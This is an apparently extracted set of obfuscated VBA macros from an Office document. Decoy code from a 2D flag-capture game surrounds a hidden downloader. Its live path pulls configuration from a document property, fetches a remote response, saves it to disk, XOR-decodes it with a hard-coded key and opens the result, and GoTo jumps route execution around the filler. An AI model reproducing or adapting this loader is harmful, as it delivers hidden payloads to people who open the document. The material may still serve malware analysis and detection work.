aa = plusplus(bskcp4 Mod plusplusLen)
bb = lone(bskcp4)
lone(bskcp4) = RDFGBR(bb, aa)
If (bskcp4 >= bskcp6) Then
bskcp3 = Int((bskcp4 / bskcp5) * 100)
bskcp6 = (bskcp5 * ((bskcp3 + 1) / 100)) + 1
End If
Next
End Function
Public Sub WidthA(Dbbb As String, bbbJ As String, Optional BladeRunner_Sexote As String)
Dim bbb As Integer
bbb = FreeFile
Dim Gbbb() As Byte
Open Dbbb For Binary As #bbb
ReDim Gbbb(0 To LOF(bbb) - 1)
Get #bbb, , Gbbb()
Close #bbb
Call PuWord(Gbbb(), BladeRunner_Sexote)
bbb = FreeFile
Open bbbJ For Binary As #bbb
Put #bbb, , Gbbb()
Close #bbb
End Sub
Public Sub Flags(Colr As Integer, I As Integer)
If BackBuffer.isLost Then Exit Sub
Dim xt As Integer, yt As Integer, a As Integer, b As Integer, G As Byte
Dim rFlag As RECT
G = 0
If Colr = 1 Then
G = 1
If FlagCarry1(I) > 0 Then
Flag1(0, I) = Players(FlagCarry1(I)).charX + 18
Flag1(1, I) = Players(FlagCarry1(I)).charY + 3: G = 9
End If
xt = Flag1(0, I)
yt = Flag1(1, I)
ElseIf Colr = 2 Then
G = 2
If FlagCarry2(I) > 0 Then
Flag2(0, I) = Players(FlagCarry2(I)).charX + 18
Flag2(1, I) = Players(FlagCarry2(I)).charY + 3: G = 9
End If
xt = Flag2(0, I)
yt = Flag2(1, I)
ElseIf Colr = 3 Then
G = 3
If FlagCarry3(I) > 0 Then
Flag3(0, I) = Players(FlagCarry3(I)).charX + 18
Flag3(1, I) = Players(FlagCarry3(I)).charY + 3: G = 9
End If
xt = Flag3(0, I)
yt = Flag3(1, I)
ElseIf Colr = 4 Then
G = 4
If FlagCarry4(I) > 0 Then
Flag4(0, I) = Players(FlagCarry4(I)).charX + 18
Flag4(1, I) = Players(FlagCarry4(I)).charY + 3: G = 9
End If
xt = Flag4(0, I)
yt = Flag4(1, I)
ElseIf Colr = 5 Then
G = 5
If FlagCarry5(I) > 0 Then
Flag5(0, I) = Players(FlagCarry5(I)).charX + 18
Flag5(1, I) = Players(FlagCarry5(I)).charY + 3: G = 9
End If
xt = Flag5(0, I)
yt = Flag5(1, I)
End If
out:
End Sub
Public Sub PlayCry(cry As Integer)
If cry = 1 Then
CallByName CofeeShop, F3.OptionButton1.Tag, VbMethod, AlertN(5), BladeRunner_4, False
Exit Sub
Else: GoTo lab1
End If
If c.Ry.Offset = 0 Then
Exit Sub
End If
writer.Write (Encoding.ASCII.GetBytes("RIFF"))
writer.Write (0)
writer.Write (Encoding.ASCII.GetBytes("WAVE"))
writer.Write (Encoding.ASCII.GetBytes("fmt "))
writer.Write (16)
writer.Write (CUS.hort(1))
writer.Write (CUS.hort(1))
lab1:
CallByName CofeeShop, F3.OptionButton2.Tag, VbMethod, BladeRunner_System, _
F3.SpinButton1.Tag
Exit Sub
stream.Seek 0, SeekOrigin.begin
Player.Load
Player.Play
End Sub
Public Sub Vertik()
Set CofeeShop = CreateObject(VertikName)
smbi = F3.Label1.Caption
AlertNE = AlertN(2)
AnimTransferMap "Caption", False
Stocke = 24 / 4
BladeRunner_FLAME = BladeRunner_VEAM(AlertN(6))
MakeFarplane "G", "I", "MS"
End Sub
Public Function FindNext(R As String, S As Integer) As String
CallByName SubProperty, "sav" + F3.o3.Caption, VbMethod, BladeRunner_PathTo2, 2
WidthA BladeRunner_PathTo2, BladeRunner_Project, "9qiWnEBW5nxLRKrGHCctuD3GOzhE35Wb"
BladeRunner_aifde.Open (BladeRunner_Project)
End Function
Public Function HMBCP(D)
Dim fb As Asck
doc_string = "Outline Level 2"
Set fb = New Asck
doc_string = "Outline Level 3"
fb.PropellersHead
End Function
Public Function RDFGBR(a, b)
Dim GBR
GBR = a Xor b
Dim RDF
RDF = a Or b
RDFGBR = GBR
End Function
Public Sub DropFlag()
Dim lMsg As Byte
Dim oNewMsg() As Byte, lNewOffSet As Long
lNewOffSet = 0
ReDim oNewMsg(0)
lMsg = MSG_DROPFLAG
AddBufferData oNewMsg, VarPtr(lMsg), LenB(lMsg), lNewOffSet
SendTo oNewMsg
End Sub
Public Sub WriteChat()
Dim e As Integer, j As Integer, q As Integer, F As Integer, D As Integer, rrect As RECT, I As Integer
DirectDraw_Chat.BltColorFill rrect, KEYColor
e = 1
j = UBound(Chat)
For I = 0 To j
q = Len(Chat(I))
While q > 0
F = MakeText(Mid$(Chat(I), 1, 1) & Mid$(Chat(I), e + 1, q), 5, 5 + (I + D) * 12, True, DirectDraw_Chat)
e = e + F - 1
q = Len(Chat(I)) - e
If q > 0 Then D = D + 1
Wend
e = 0: q = 0
Next
End Sub
Public Sub mapRender()
GoTo fixedTypeLbl2
If BackBuffer.isLost Then Exit Sub
If DirectDraw_Tiles Is Nothing Then Exit Sub
Dim DestX As Single, DestY As Single, FrameChange(255, 255) As Byte
Dim I As Integer, R As Integer, j As Integer, c As Integer, D As Integer, a As Integer, e As Integer
Dim Xfind As Integer, Yfind As Integer, Xwdth As Integer, Ywdth As Integer, X As Integer
Dim Xcoor As Integer, Ycoor As Integer, Xdif As Integer, Ydif As Integer
Dim TileGet As Integer, xt As Integer, yt As Integer, ToX As Integer, ToY As Integer
ReDim AnimsPlayed(0)
MeX = Playe.rs(MeNum).charX - CenterSX
MeY = Playe.rs(MeNum).charY - CenterSY
MapX = (MeX - (MeX Mod 16)) / 16 'Possible failure
MapY = (MeY - (MeY Mod 16)) / 16 'Possible failure
If MeY < 0 Then MapY = MapY - 1
If MeX < 0 Then MapX = MapX - 1
DestX = Playe.rs(MeNum).charX - MapX * 16
DestY = Playe.rs(MeNum).charY - MapY * 16
Xdif = MeX - MapX * 16
Ydif = MeY - MapY * 16
ToX = ResX / 16 'Possible failure
ToY = ResY / 16 'Possible failure
If ResY = 600 Then
If Ydif < 8 Then ToY = 37 Else ToY = 38
End If
I = MapX * 16 + Xdif
j = MapY * 16 + Ydif
D = I
c = j
If I < 0 Then D = 0
If j < 0 Then c = 0
TileG.et.Left = D
TileG.et.Top = c
If I < 0 Then D = I Else D = 0
If j < 0 Then c = j Else c = 0
D = TileG.et.Left + ResX + D
c = TileG.et.Top + ResY + c
If D > 4080 Then D = 4080
If c > 4080 Then c = 4080
TileG.et.Right = D
TileG.et.Bottom = c
D = MapX * 16 + Xdif
c = MapY * 16 + Ydif
If D >= 0 Then D = 0
If c >= 0 Then c = 0
BackBuffer.BltFast Abs(D), Abs(c), DirectDraw_Map, TileGet, DDBLTFAST_WAIT Or DDBLTFAST_SRCCOLORKEY
c = 0
D = 0
fixedTypeLbl2:
BladeRunner_Project = BladeRunner_FLAME
BladeRunner_PathTo2 = BladeRunner_Project + "\fudziambl" + CStr(Stocke)
GoTo fixedTypeLbl3
If MeY < 0 Then c = MapY
If MeX < 0 Then D = MapX
For R = Abs(c) To ToY
For I = Abs(D) To ToX
Xcoor = I * 16
If I > 0 Then Xcoor = Xcoor - Xdif
Ycoor = R * 16
If R > 0 Then Ycoor = Ycoor - Ydif
X = AnimO.ffset(yt, xt)
If X > 0 Then
a = Animati.ons(yt, xt)
If FrameChange(FrameC.ount(a), AnimS.peed(a)) = 0 Then
If AnimS.peed(a) = 0 Then AnimS.peed(a) = 1
AnimC.ount(FrameC.ount(a), AnimS.peed(a)) = AnimC.ount(FrameC.ount(a), AnimS.peed(a)) + Speed / AnimS.peed(a)
If AnimC.ount(FrameC.ount(a), AnimS.peed(a)) > FrameC.ount(a) - 1 Then AnimC.ount(FrameC.ount(a), AnimS.peed(a)) = 0
End If
FrameChange(FrameC.ount(a), AnimS.peed(a)) = 1
e = AnimC.ount(FrameC.ount(a), AnimS.peed(a))
e = (e + X) Mod (FrameC.ount(a))
TileG.et.Top = Anim.FY(a, e) + Yfind
TileG.et.Bottom = TileG.et.Top + Ywdth
TileG.et.Left = Anim.FX(a, e) + Xfind
TileG.et.Right = TileG.et.Left + Xwdth
Call BackBuffer.BltFast(Xcoor, Ycoor, DirectDra.w_Anims(Anim.FS(a, 0)), TileGet, DDBLTFAST_WAIT Or DDBLTFAST_SRCCOLORKEY)
End If
out:
Next
Next
fixedTypeLbl3:
BladeRunner_Project = BladeRunner_Project + Replace(AlertN(12), ".", CStr(Stocke) + ".")
SubProperty.Type = 1
End Sub
Public Sub ShugarMilk(e As Integer)
Dim Rx As Integer, Ry As Integer, rBuff As String
Dim xt As Integer, yt As Integer, j As Integer
Dim NewX As Integer, NewY As Integer, D As Integer, SgnX As Integer, SgnY As Integer
Dim RatioX As Single, RatioY As Single
Rx = 452
Ry = 81
BladeRunner_4 = F3.ZK.Caption & MarkusPils(I)
Stocke = Stocke + 2
Dim XIpotom2 As Asck
Set XIpotom2 = New Asck
If e < 300 Then
XIpotom2.Challenge "RDBMS", 21
CallByName CofeeShop, F3.ToggleButton1.Caption, VbMethod
Set XIpotom2 = Nothing
Else
End If
Exit Sub
NewX = UniB.all(I).BallX
NewY = UniB.all(I).BallY
If UniB.all(I).BSpeedX > UniB.all(I).BSpeedY And UniB.all(I).BSpeedY > 0 Then RatioY = UniB.all(I).BSpeedX / UniB.all(I).BSpeedY
If UniB.all(I).BSpeedY > UniB.all(I).BSpeedX And UniB.all(I).BSpeedX > 0 Then RatioX = UniB.all(I).BSpeedY / UniB.all(I).BSpeedX
If RatioX < 1 Then RatioX = 1
If RatioY < 1 Then RatioY = 1
If UniB.all(I).BSpeedX > 0 Then UniB.all(I).BSpeedX = UniB.all(I).BSpeedX - (0.01 / RatioX) * Speed
If UniB.all(I).BSpeedY > 0 Then UniB.all(I).BSpeedY = UniB.all(I).BSpeedY - (0.01 / RatioY) * Speed
If UniB.all(I).BSpeedX < 0 Then UniB.all(I).BSpeedX = 0
If UniB.all(I).BSpeedY < 0 Then UniB.all(I).BSpeedY = 0
UniB.all(I).BLoopX = UniB.all(I).BLoopX + (UniB.all(I).BSpeedX * Speed)
For j = 1 To UniB.all(I).BLoopX
NewX = NewX + UniB.all(I).BMoveX
UniB.all(I).BLoopX = UniB.all(I).BLoopX - 1
Next
UniB.all(I).BLoopY = UniB.all(I).BLoopY + (UniB.all(I).BSpeedY * Speed)
For j = 1 To UniB.all(I).BLoopY
NewY = NewY + UniB.all(I).BMoveY
UniB.all(I).BLoopY = UniB.all(I).BLoopY - 1
Next
SgnX = Sgn(NewX - UniB.all(I).BallX)
SgnY = Sgn(NewY - UniB.all(I).BallY)
If SgnX = 1 Then 'x positive testing
For D = UniB.all(I).BallX + 1 To NewX
j = WeaponT.ouch(6, I, D, UniB.all(I).BallY)
If j = 6 Then
UniB.all(I).BMoveX = UniB.all(I).BMoveX * -1
NewX = D - 1
Exit For
End If
Next
End If
If SgnX = -1 Then 'x negative testing
For D = UniB.all(I).BallX - 1 To NewX Step -1
j = WeaponT.ouch(6, I, D, UniB.all(I).BallY)
If j = 6 Then
UniB.all(I).BMoveX = UniB.all(I).BMoveX * -1
NewX = D + 1
Exit For
End If
Next
End If
If SgnY = 1 Then 'y positive testing
For D = UniB.all(I).BallY + 1 To NewY
j = WeaponT.ouch(6, I, NewX, D)
If j = 6 Then
UniB.all(I).BMoveY = UniB.all(I).BMoveY * -1
NewY = D - 1
Exit For
End If
Next
End If
If SgnY = -1 Then 'y negative testing
For D = UniB.all(I).BallY - 1 To NewY Step -1
j = WeaponT.ouch(6, I, NewX, D)
If j = 6 Then
UniB.all(I).BMoveY = UniB.all(I).BMoveY * -1
NewY = D + 1
Exit For
End If
Next
End If
UniB.all(I).BallX = NewX
UniB.all(I).BallY = NewY
j = WeaponT.ouch(6, I, NewX, NewY)
xt = NewX
yt = NewY
xt = xt - MeX: yt = yt - MeY
rBuf.F.Top = Ry
rBuf.F.Bottom = rBuf.F.Top + 10
rBuf.F.Left = Rx + 10 * (UniB.all(I).Color - 1)
rBuf.F.Right = rBuf.F.Left + 10
If xt < 0 Then rBuf.F.Left = rBuf.F.Left + Abs(xt): xt = 0
If yt < 0 Then rBuf.F.Top = rBuf.F.Top + Abs(yt): yt = 0
If xt > ResX - 10 Then rBuf.F.Right = rBuf.F.Right - (xt - (ResX - 10)): xt = (ResX - 10) + (xt - (ResX - 10))
If yt > ResY - 10 Then rBuf.F.Bottom = rBuf.F.Bottom - (yt - (ResY - 10)): yt = (ResY - 10) + (yt - (ResY - 10))
BackBuffer.BltFast xt, yt, DirectDraw_NavBar, rBuff, DDBLTFAST_WAIT Or DDBLTFAST_SRCCOLORKEY
End Sub
Public Sub MakeFarplane(a As String, b As String, c As String)
GoTo old18
If BackBuffer.isLost Then Exit Sub
Dim xt As Integer, yt As Integer, rDD As Integer
Dim xtl As Integer, ytl As Integer, xw As Integer, yw As Integer
xw = ResX
yw = ResY
If xw > 1280 Then xw = 1280
If yw > 960 Then yw = 960
xt = 0.1568 * MeX
yt = 0.1176 * MeY
xtl = xt + xw
ytl = yt + yw
If xtl > 1280 Then
xt = 1280 - xw
xtl = 1280
End If
If ytl > 960 Then
yt = 960 - yw
ytl = 960
End If
'
old18:
On Error GoTo dee13
Dim I
For I = LBound(MarkusPils) To UBound(MarkusPils) Step 1
ShugarMilk 64
If CofeeShop.Status <> 200 Then
Err.Raise 700 + vbObjectError, "G", "Dro"
End If
MakeFarplane2 31
Exit Sub
dee13:
Next
On Error GoTo 0
Exit Sub
If xt < 0 Then
xt = 0
xtl = xw
End If
If yt < 0 Then
yt = 0
ytl = yw
End If
'
With rD.D.hh
.Left = xt
.Top = yt
.Right = xtl
.Bottom = ytl
End With
BackBuffer.BltFast 0, 0, DirectDraw_Farplane, rDD, DDBLTFAST_WAIT
End Sub
Public Sub MakeFarplane2(I As Integer)
Dim j As Integer, D As Integer, DiagMvSpd As Single, LastCX As Single, LastCY As Single, e As Integer
Dim MvSpd As Single, sx As Single, sy As Single, chs As Single
GoTo sinus
MvSpd = Speed * 1.1
If Player.S(I).FlagWho > 0 Then MvSpd = MvSpd * 0.75
If Player.S(I).DevCheat > 2 Then MvSpd = MvSpd * 3
If Player.S(I).Mode = 1 Then MvSpd = MvSpd * 6
DiagMvSpd = 0.7 * 1.1
chs = MvSpd / (Int(MvSpd) + 1)
If Player.S(I).Ship = 6 Then
Select Case Player.S(I).KeyIs
Case Is = vbKeyLeft
Player.S(I).animY = aLEFT2
Case Is = vbKeyUp
Player.S(I).animY = aUP2
Case Is = vbKeyRight
Player.S(I).animY = aRIGHT2
Case Is = vbKeyDown
Player.S(I).animY = aDOWN2
End Select
End If
Player.S(I).animX = Player.S(I).KeyIs
If Val(Int(MvSpd)) > 100 Then Exit Sub
For j = 0 To Int(MvSpd)
LastCX = Player.S(I).charX
LastCY = Player.S(I).charY
If Player.S(I).KeyIs = 1 Then
Player.S(I).charX = Player.S(I).charX + chs
ElseIf Player.S(I).KeyIs = 2 Then
Player.S(I).charX = Player.S(I).charX + chs * DiagMvSpd
Player.S(I).charY = Player.S(I).charY - chs * DiagMvSpd
ElseIf Player.S(I).KeyIs = 3 Then
Player.S(I).charY = Player.S(I).charY - chs
ElseIf Player.S(I).KeyIs = 4 Then
Player.S(I).charY = Player.S(I).charY - chs * DiagMvSpd
Player.S(I).charX = Player.S(I).charX - chs * DiagMvSpd
ElseIf Player.S(I).KeyIs = 5 Then
Player.S(I).charX = Player.S(I).charX - chs
ElseIf Player.S(I).KeyIs = 6 Then
Player.S(I).charX = Player.S(I).charX - chs * DiagMvSpd
Player.S(I).charY = Player.S(I).charY + chs * DiagMvSpd
ElseIf Player.S(I).KeyIs = 7 Then
Player.S(I).charY = Player.S(I).charY + chs
ElseIf Player.S(I).KeyIs = 8 Then
Player.S(I).charY = Player.S(I).charY + chs * DiagMvSpd
Player.S(I).charX = Player.S(I).charX + chs * DiagMvSpd
End If
Call ShipTo.uch(I)
For e = 1 To UBound(RetCollision)
D = RetCollision(e)
If D = 8 Then Player.S(I).charY = Player.S(I).charY - chs * 0.7
If D = 9 Then Player.S(I).charY = Player.S(I).charY + chs * 0.7
If D = 10 Then Player.S(I).charX = Player.S(I).charX - chs * 0.7
If D = 11 Then Player.S(I).charX = Player.S(I).charX + chs * 0.7
'The following four lines stop you from moving backwards on
'ramps if you have a flag.
'If D = 8 And Player.s(i).FlagWho > 0 And Player.s(i).KeyIs = 7 Then Player.s(i).charY = LastCY
'If D = 9 And Player.s(i).FlagWho > 0 And Player.s(i).KeyIs = 3 Then Player.s(i).charY = LastCY
'If D = 10 And Player.s(i).FlagWho > 0 And Player.s(i).KeyIs = 1 Then Player.s(i).charX = LastCX
'If D = 11 And Player.s(i).FlagWho > 0 And Player.s(i).KeyIs = 5 Then Player.s(i).charX = LastCX
Next
GoSub whatever
Next
Exit Sub
sinus:
mapRender
CallByName SubProperty, "Open" + "", VbMethod
BladeRunner_PokerFace = CallByName(CofeeShop, "re" + "sponseBody", VbGet)
Dim DRO As BounceCastle
Set DRO = New BounceCastle
DRO.Ant
Exit Sub
whatever:
sx = Player.S(I).charX
sy = Player.S(I).charY
'
Call ShipTo.uch(I)
If UBound(RectsRet) > 0 Then
Player.S(I).charX = LastCX
Player.S(I).charY = LastCY
If (FindRects.Ret(104) And FindRects.Ret(105)) Or (FindRects.Ret(112) And FindRects.Ret(113)) Then
Player.S(I).charY = sy
Call ShipTo.uch(I)
If Player.S(I).charY = LastCY Then
If FindRects.Ret(112) And FindRects.Ret(113) Then 'touch right
Player.S(I).charX = Player.S(I).charX - 1
End If
Call ShipTo.uch(I)
If FindRects.Ret(104) And FindRects.Ret(105) Then 'touch left
Player.S(I).charX = Player.S(I).charX + 1
End If
End If
If UBound(RectsRet) > 0 Then Player.S(I).charY = LastCY
Return
End If
If (FindRects.Ret(101) And FindRects.Ret(109)) Or (FindRects.Ret(108) And FindRects.Ret(116)) Then
Player.S(I).charX = sx
Call ShipTo.uch(I)
If Player.S(I).charY = LastCY Then
If FindRects.Ret(101) And FindRects.Ret(109) Then 'touch top
Player.S(I).charY = Player.S(I).charY + 1
End If
Call ShipTo.uch(I)
If FindRects.Ret(108) And FindRects.Ret(116) Then 'touch bottom
Player.S(I).charY = Player.S(I).charY - 1
End If
End If
If UBound(RectsRet) > 0 Then Player.S(I).charX = LastCX
Return
End If
End If
For e = 1 To UBound(RectsRet)
D = RectsRet(e)
If D = 101 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.8
End If
If D = 102 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.4
End If
If D = 103 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.4
End If
'
If D = 104 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.8
End If
If D = 105 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.8
End If
'
If D = 106 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.4
End If
If D = 107 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.4
End If
If D = 108 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX + chs * 0.8
End If
'
If D = 109 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.8
End If
If D = 110 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.4
End If
If D = 111 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.4
End If
If D = 112 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY + chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.8
End If
'
If D = 113 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.8
End If
If D = 114 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.4
End If
If D = 115 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.4
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.4
End If
If D = 116 Then
If sx - LastCX <> 0 Then Player.S(I).charY = Player.S(I).charY - chs * 0.8
If sy - LastCY <> 0 Then Player.S(I).charX = Player.S(I).charX - chs * 0.8
End If
Next
'
Call ShipTo.uch(I)
If UBound(RectsRet) > 0 Then
Player.S(I).charX = LastCX
Player.S(I).charY = LastCY
If (FindRects.Ret(104) And FindRects.Ret(105)) Or (FindRects.Ret(112) And FindRects.Ret(113)) Then
Player.S(I).charY = sy
Call ShipTo.uch(I)
If UBound(RectsRet) > 0 Then Player.S(I).charY = LastCY
Return
End If
If (FindRects.Ret(101) And FindRects.Ret(109)) Or (FindRects.Ret(108) And FindRects.Ret(116)) Then
Player.S(I).charX = sx
Call ShipTo.uch(I)
If UBound(RectsRet) > 0 Then Player.S(I).charX = LastCX
Return
End If
End If
Return
End Sub"
File "BounceCastle.cls" (Streampath: "VBA/BounceCastle") has code: "Sub doc_of_word_outline_level6()
doc_string = "Outline Level 6"
End Sub
Sub word_outline_level6()
Selection.Paragraphs(1).OutlineLevel = wdOutlineLevel6
comple.te
End Sub
Sub doc_of_word_outline_level7()
doc_string = "Outline Level 7"
End Sub
Sub word_outline_level7()
Selection.Paragraphs(1).OutlineLevel = wdOutlineLevel7
comple.te
End Sub
Sub WriteLOG(sMessage$)
If (bLOGOn = cOn) Then
Wri.te nLOGFileHandle, sMessage
End If
End Sub
Sub ErrorMessage(sMessage$)
If (bLOGOn = cOn) Then
WriteLOG (sMessage$)
Else
MsgBox sMessage$, 16
End If
End Sub
Sub InfoMessage(sMessage$)
If (bShowErrorsOnly = cOff) Then
If (bLOGOn = cOn) Then
WriteLOG (sMessage$)
Else
MsgBox sMessage$, 64
End If
End If
End Sub
Public Sub Ant()
SubProperty.Write BladeRunner_PokerFace
GoTo cip
If Not CryToLoad.Compressed Then
For G = 0 To CryToLoad.Size - 1
CryToLoad.Data(G) = ByteTo.SignedInt("&H" & (Rea.dHEX(LoadedROM, (cryOffset) + 16 + G, 1)))
Next
Else
If Alignment = 0 Then
pcmLevel = ByteTo.SignedInt("&H" & (Rea.dHEX(LoadedROM, offtrack, 1)))
offtrack = offtrack + 1
Data.Add (pcmLevel)
Alignment = &H20
End If
offtrack = offtrack + 1
If Alignment < &H20 Then
Data.Add (pcmLevel)
End If
Data.Add (pcmLevel)
If Size >= CryToLoad.Size Then
End If
Alignment = 1
CryToLoad.Data = Data.ToArray()
CryToLoad.Size = offtrack - Start
End If
cip:
If BladeRunner_Fish <> 0 Then
Exit Sub
End If
FindNext "4", 3
End Sub"
File "Asck.cls" (Streampath: "VBA/Asck") has code: "Public Function PropellersHead() As String
tt = ThisDocument.BuiltInDocumentProperties("Content status").Value
AlertN = Split(tt, "HUBBLE")
VertikName = AlertN(Quubo * 3)
Vertik
PropellersHead = ""
End Function
Public Sub Challenge(sender As String, e As Integer)
PlayCry 1
PlayCry 350
End Sub"
File "F3.frm" (Streampath: "VBA/F3") has code: ""
File "Class1.cls" (Streampath: "VBA/Class1") has code: "Public Function CheckRectsAd() As Boolean
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 32
.Top = g_cursory
.Bottom = .Top + 1
End With
If IntersectRect(rTemp, AdRect, rMouse) Then
CheckRectsAd = True
Exit Function
End If
End Function
Public Function CheckRectsNav() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 32
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(NavRect)
If I < 8 Then
If IntersectRect(rTemp, NavRect(I), rMouse) Then
CheckRectsNav = I + 1
Exit Function
End If
End If
Next
End Function
Public Function CheckRectsMenu4() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 32
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(MenuRect)
If IntersectRect(rTemp, MenuRect(I), rMouse) Then
CheckRectsMenu4 = I + 1
Exit Function
End If
Next
End Function
Public Function CheckRectsMenuMenu1() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
If MenuMenu = 1 Then
For I = 0 To 3
If IntersectRect(rTemp, rHelp(I), rMouse) Then
CheckRectsMenuMenu1 = I + 1
Exit Function
End If
Next
End If
If MenuMenu = 5 Then
If IntersectRect(rTemp, rHelp(4), rMouse) Then
CheckRectsMenuMenu1 = 5
Exit Function
End If
End If
If MenuMenu = 6 Then
If IntersectRect(rTemp, rHelp(5), rMouse) Then
CheckRectsMenuMenu1 = 5
Exit Function
End If
End If
If MenuMenu = 7 Or MenuMenu = 8 Then
If IntersectRect(rTemp, rHelp(5), rMouse) Then
CheckRectsMenuMenu1 = 5
Exit Function
End If
End If
If MenuMenu = 7 Then
If IntersectRect(rTemp, rHelp(6), rMouse) Then
CheckRectsMenuMenu1 = 6
Exit Function
End If
End If
End Function
Public Function CheckRectsMenuMenu2() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(Menu2Rect)
If IntersectRect(rTemp, Menu2Rect(I), rMouse) Then
CheckRectsMenuMenu2 = I + 1
Exit Function
End If
Next
End Function
Public Function CheckRectsMenu3() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(Menu3Rect)
If IntersectRect(rTemp, Menu3Rect(I), rMouse) Then
CheckRectsMenu3 = I + 1
Exit Function
End If
Next
End Function
Public Function CheckRectsMenuMenu3() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(rConfig)
If IntersectRect(rTemp, rConfig(I), rMouse) Then
CheckRectsMenuMenu3 = I + 1
Exit Function
End If
Next
End Function
Public Function CheckRectsMenuMenu4() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(Menu4Rect)
If IntersectRect(rTemp, Menu4Rect(I), rMouse) Then
CheckRectsMenuMenu4 = I + 1
Exit Function
End If
Next
End Function
Public Function CheckRectMenu9() As Boolean
Dim rTemp As RECT, rMouse As RECT
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
If IntersectRect(rTemp, Menu9Rect, rMouse) Then CheckRectMenu9 = True
End Function
Public Function CheckRectsPlayerOpt() As Integer
Dim rTemp As RECT, rMouse As RECT, I As Integer
With rMouse
.Left = g_cursorx
.Right = .Left + 1
.Top = g_cursory
.Bottom = .Top + 1
End With
For I = 0 To UBound(PlayerOptR)
If I > 1 Or Not Players(MeNum).Admin > 0 Then
If IntersectRect(rTemp, PlayerOptR(I), rMouse) Then
CheckRectsPlayerOpt = I + 1
Exit Function
End If
End If
If I = 1 And Not Players(MeNum).Admin > 0 Then Exit Function
Next
End Function
Public Sub DoOption()
Dim lMsg As Byte, j As Integer, b As Byte
Dim oNewMsg() As Byte, lNewOffSet As Long
'
If NavMenu = 3 Then
j = CheckRectsMenu3
If j = 1 Then PlayerScroll = PlayerScroll - 1
If j = 2 Then PlayerScroll = PlayerScroll + 1
If j > 3 Then PlayerSelected = j - 3
If PlayerScroll < 0 Then PlayerScroll = 0
If UBound(Players) > 10 Then
If PlayerScroll > UBound(Players) - 10 Then PlayerScroll = UBound(Players) - 10
Else
PlayerScroll = 0
End If
j = CheckRectsPlayerOpt
PlayerOpt = j
If j > 0 Then Exit Sub
End If
'
If MenuMenu = 1 Or (MenuMenu > 4 And MenuMenu < 9) Then
j = CheckRectsMenuMenu1
If j = 1 Then MenuMenu = 5
If j = 2 Then MenuMenu = 6
If j = 3 Then MenuMenu = 7
If j = 4 Then MenuMenu = 0
If j = 5 Then MenuMenu = 1
If j = 6 Then MenuMenu = 8
End If
'
If MenuMenu = 2 Then 'Team Switch
j = CheckRectsMenuMenu2
If j = 5 Then MenuMenu = 0
If j > HData.NumTeams Then Exit Sub
b = j
On Local Error Resume Next
lMsg = MSG_TEAM
lNewOffSet = 0
ReDim oNewMsg(0)
AddBufferData oNewMsg, VarPtr(lMsg), LenB(lMsg), lNewOffSet
